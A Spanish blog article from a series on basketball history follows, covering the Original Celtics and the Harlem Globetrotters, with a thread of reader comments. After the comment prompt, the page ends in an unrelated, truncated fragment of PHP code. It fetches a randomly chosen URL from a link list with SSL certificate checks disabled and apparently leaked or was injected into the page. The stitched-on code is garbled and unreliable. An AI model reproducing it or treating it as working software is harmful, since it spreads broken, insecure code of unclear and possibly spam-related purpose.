Los grandes equipos de la primera mitad del siglo XX (y II)

10 de April de 2010 por Sergio
Artículo 8 de 9 de la serie Historia de la NBA

Tras conocer mejor a los New York Rens, os acercamos a las otras dos grandes franquicias de principios del siglo XX: los Original Celtics y los Harlem Globetrotters:.

Original Celtics

Este equipo, sin relación alguna con los actuales Boston Celtics, fue el otro gran equipo de la primera mitad de siglo.

Estos Celtics (y los posteriores) son fruto de la corriente migratoria que sufrió Irlanda debido a la tremenda hambruna que tuvo lugar en aquel país a partir de 1850, generando que cerca de un millón de irlandeses se establecieran en EEUU durante aquellos años. Este pueblo instauró sus costumbres en el país que lo acogía, teniendo gran importancia cultural en el desarrollo de las costumbres actuales en el país creador del baloncesto. Gran parte de los actuales apellidos norteamericanos tienen raíces en la verde república atlántica.

El equipo tenía su sede “oficial” en el Hudson Guild Settlement House, dentro del barrio entonces conocido como Hell’s Kitchen. Es decir, podemos hablar de los New York Celtics, nada de Boston por ahora. En un principio dedicado a jugar en competiciones profesionales, posteriormente se dedicó a jugar partidos contra otros equipos de diversas ciudades a modo de enfrentamientos de exhibición. Durante uno de aquellos años recorrieron cerca de 250.000 km para jugar un número de partidos entre 150 y 200, y en otra de ellos consiguieron el impresionante récord de 193-11-1 (entonces los empates eran algo permitido).

Algunos de los jugadores más importantes de existencia fueron “Dutch” Dehnert, Nat Holman y el ya mencionado  en el anterior artículo, Joe Lapchick, apodado el “Babe Ruth del baloncesto”. Los Original Celtics han pasado a la posteridad como los primeros ganadores de la ABL (logro que repetirían al año siguiente), y bien pudieron ganar muchos más títulos si no hubiese sido encarcelado su propietario, Jim Furey, lo que dejó sumido al equipo en un gran problema económico. También formaron parte de la Eastern Basketball League y la Metropolitan Basketball League. En la primera reemplazaron a los New York Giants a partir de la segunda vuelta de la temporada 21-22.

Muchos de los conceptos básicos del juego en equipo fueron introducidos por los celtas. Aspectos como las técnicas en el poste alto, la rotación de posiciones, la agilidad en los pases y ciertos sistemas defensivos eran comunes en este equipo. Después de todo parece que si existen similitudes entre estos verdes y sus sucesores.

Tras aquellos años 20 el equipo no fue el mismo. Aunque su nivel de juego era superior a la mayoría de sus competidores, los problemas económicos hacían mella en la confianza de los jugadores. Los dueños del equipo decidieron vender a sus mejores jugadores al resto de equipos de la ciudad, intentando mantener la atención de la afición sobre la recién nacida competición, pero todo fueron intentos inútiles.

Aunque durante los años 30 se intentó reunir a la franquicia por segunda vez, los ingresos no compensaban los logros del equipo. El fin total del equipo tuvo lugar en 1935, pero los dueños del Hall of Fame supieron mantener viva la llama de este legendario equipo con su inclusión en el Hall of Fame en 1959.

Harlem Globetrotters

A pesar de que para muchos de nosotros hablar de los Globetrotters significa hablar de partidos más próximos al show y al espectáculo que a la competición pura y dura, no fue ese el cometido para el que fue fundado el equipo.

Los inicios del equipo no están del todo claros. Aunque al oir hablar de Harlem nuestra mente piense directamente en el barrio neoyorkino, el equipo fue fundado en el estado de Illinois, concretamente en el sur de Chicago, de donde eran oriundos la mayoría de jugadores de ese primer grupo. Gran parte de esos jugadores crecieron estudiando en el Wendell Phillip High School. Durante su estancia en dicho instituto tuvieron el privilegio de ver disputar partidos al equipo de los Savoy Big Five, lo que hizo que la mayoría de ellos se inclinaran por la práctica del baloncesto desde su juventud. Todos ellos jugaron su primer partido un 7 de Junio de 1927 con este conjunto del instituto.

En 1928 muchos de los jugadores dejaron el equipo por problemas con los directores del equipo. Estos formaron un nuevo equipo, dándole el apodo de Globe Trotters debido a la gira que tenían planeada esa primavera por el sur del estado. El nombre de Harlem viene como homenaje a la zona representativa de la comunidad negra en EEUU, uno de los barrios mas famosos de NY, y en aquellos momentos epicentro de la cultura afroamericana. Curiosamente, el equipo no jugó su primer partido en Harlem hasta 1968.

Inicialmente, el equipo estaba enfocado a la competición, y su nivel era muy alto, especialmente tras el fichaje de Inman Jackson y Albert Pullins (primera “estrella” del equipo),  estrellas del baloncesto estatal durante aquella década. Las habilidades que muestran hoy en día nacieron de aquella superioridad aplastante de la que hacían gala. En ocasiones, solo viajaban 5 jugadores con el equipo, debiendo permanecer en pista durante todo el partido. Cuando conseguían grandes ventajas se dedicaban a pasarse la pelota y a botarla entre las piernas, mostrando un gran repertorio de técnicas de retención de la posesión para descansar las piernas y estar en mejores condiciones físicas para posteriores encuentros amén de ridiculizar a sus oponentes. Cuando comprobaron que esa forma de juego cautivaba a los aficionados decidieron implementarla a su juego como seña de identidad del equipo. Posteriormente esta forma de juego llegaría a causarle problemas durante los años de la carta de los Derechos Civiles, argumentando algunos sectores que el equipo se dedicaba a mofarse de la población blanca.

En 1939 entraron a disputar la World Professional Basketball League, donde se enfrentaron en las semifinales a los New York Rens. Aquel primer partido entre los dos equipos formados por afroamericanos más importantes del momento fue tan sólo el primer capítulo de otra de las mayores y más interesantes rivalidades que ha dado este deporte. De hecho, durante el siguiente campeonato de la WPBL se vengaron de los Rens en la misma ronda y doblegaron a los Chicago Bears en la prórroga por 37-36.

Para que os hagáis una idea del nivel de este equipo, derrotaron dos veces al primer equipo profesional de la historia, los Minneapolis Lakers de George Mikan durante los años 1948 y 1949. Este hecho también significó una muestra de que los jugadores de raza negra estaban igualmente capacitados para competir al máximo nivel.

Algunos de los mejores jugadores de la NBA han pasado en algun momento de su vida por los Globetrotters, como Connie Hawkins, Nat Clifton, Jerome James, Jamario Moon y, por supuesto, el gran Wilt Chamberlain.

La posterior historia, enfocada en el show business es más conocida por todas, si bien es remarcable que, desde 1962, sólo hayan perdido dos partidos entre los más de 12.600 disputados. Uno de esos partidos fue la derrota cosechada ante un All-Star de la NBA donde se encontraba un Abdul-Jabbar con 48 años. Aunque su porcentaje no es comparabale a los equipos profesionales de las ligas americanas, tiene un promedio de victorias por encima del 98%.

Como muchos equipos de la NBA, los Harlem’s tienen retirados 5 dorsales de antiguos jugadores del equipo:

Dorsal              Jugador

13                    Wilt Chamberlain
20                    Marques Haynes
22                    Curly Neal
36                    Meadowlark Lemon
50                    Reece “Goose” Tatum

También existen datos curiosos, como algunos personajes nombrados miembros honorarios del equipo, como Nelson Mandela, Henry Kissinger, Juan Pablo II, Kareem Abdul-Jabbar o Whoopi Goldberg. Otros como Magic Johnson y Bill Cosby tienen firmado un contrato de por vida por unos honorarios de 1$. Así que, despues de todo, el señor Earvin Johnson sigue en activo.

Una historia de espectáculo pero también de superioridad la de estos Harlem Globetrotters. ¿O no?

Comenta

12 comentarios a esta entrada

  1. NBA LAKERS BLOG dice:
    #1

    Wau! Siempre se aprende algo nuevo! Graicas por la info. 😉

    Te invito a nuestro blog de los Lakers!

    Un fuerte abrazo!

    -NM-

      Citar

  2. Txusma dice:
    #2

    Cuantos de vosotros ha visto a los Globetrotters en directo? Yo lo hice hace muchísimo tiempo cuando de la mano de mi padre me fuí a verlos a la plaza de toros de la ciudad, convertida en pista de baloncesto para esa ocasión. Todas las gradas llenas y risas y diversión por doquier. Sin duda, uno de mis mejores recuerdos de niño.

      Citar

  3. sergio dice:
    #3

    Yo tambien los vi en Malaga hace unos cuantos años… puro espectaculo los tios estos. Alguno puede pensar que no es baloncesto, pero es una cantera de movimientos y habilidades que han ido incorporandose al baloncesto profesional. Creo que su influencia, al igual que la del streetbasket no puede ser discutida.

    Me alegro de que os gusten los articulos, pero parece que no tiene muxo exito xD

      Citar

  4. Txusma dice:
    #4

    Yo creo que sí tienen éxito pero es complicado comentar alguna cosa de los Original Celtics… A lo mejor hay que meterle más picante a los artículos. Por ejemplo: “Los Original Celtics le hubieran pegado un buen repaso a los Bucks actuales” o “Si Iverson hubiese jugado en los Globetrotters sería aún mejor jugador de lo que ya fue” 😀

      Citar

  5. sayim dice:
    #5

    Yo los leo con mucho interés, lo que pasa es que es lo que dice Txusma, no me atrevo a comentar nada… De todas maneras yo creo q Los Original Celtics son mucho mejor equipo q los actuales Bucks… jejeje

      Citar

  6. sergio dice:
    #6

    Jaja… eso es tener maldad. No quiero que se parezca al marca.

      Citar

  7. Love Denise dice:
    #7

    sergio, yo leo siempre tus articulos y me encantan, lo que pasa, al menos a mí, es que tus artículos son muy buenos para informarse, pero es complicado para debatir, puesto que son cosas de los años 40, 50, de las cuales yo no tengo mucho conocimiento para comentar algo.

      Citar

  8. TheDeerHunter dice:
    #8

    No caigais en el error de medir el éxito de un artículo por el número de comentarios.
    Para mí el éxito de esta serie radica en que sube el nivel del blog, sobre todo en el plano didáctico. Sube tanto el nivel que lo difícil hasta para los más metidos en el tema es encontrar comentarios que estén a la altura. Supongo que ese es el problema.
    Se trata de valor añadido puro y duro, sin descuentos.

    Eso sí, estoy de acuerdo con lo de que mencionar a Iverson en estos lares te asegura un buen número de comentarios… ;b

      Citar

  9. kantonyo dice:
    #9

    Estoy con vosotros, este tipo de articulos le dan un plus de calidad al blog. Para entender mejor el presente es esencial conocer el pasado. Además tecnicamente genera muchas visitas de las que podemos pensar, ya que hay muy pocas páginas en la red que traten estos temas en español, por ejemplo es buscar en google (en español), Toronto Huskies, St. Louis Bombers y aparece los articulos en primera página.

      Citar

  10. Toni dice:
    #10

    Yo tambien leo todos los articulos pero al ser el articulo fundamentalmente mi base de conocimientos no tengo demasiado que añadir.

      Citar

  11. sergio dice:
    #11

    No me referia tanto al nivel de comentarios como al numero de visitas o afinidades en el Facebook (por cierto que todavia no me he hecho seguidor del blog en el facebook…). Desde luego se que es un tema que no invita demasiado a comentar. De hecho apenas hay documentos graficos sobre estos tipos. Desde luego, para mi es indiferente la repercusion que tenga. Hago los articulos con mucho gusto y sin importarme nada excepto el ayudar al blog a aumentar aspectos deportivos historicos que no habian sido demasiado tocados. Antes ya era uno de los mejores blogs de nba de España, por no decir el mejor. Yo solo intento aportar para mantener el tipo.

      Citar

  12. LEmontus dice:
    #12

    Los arículos están muy bien pero obviamente no dan juego para debatir, yo personalmente los leo todos pero no he comentado en casi ninguno.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>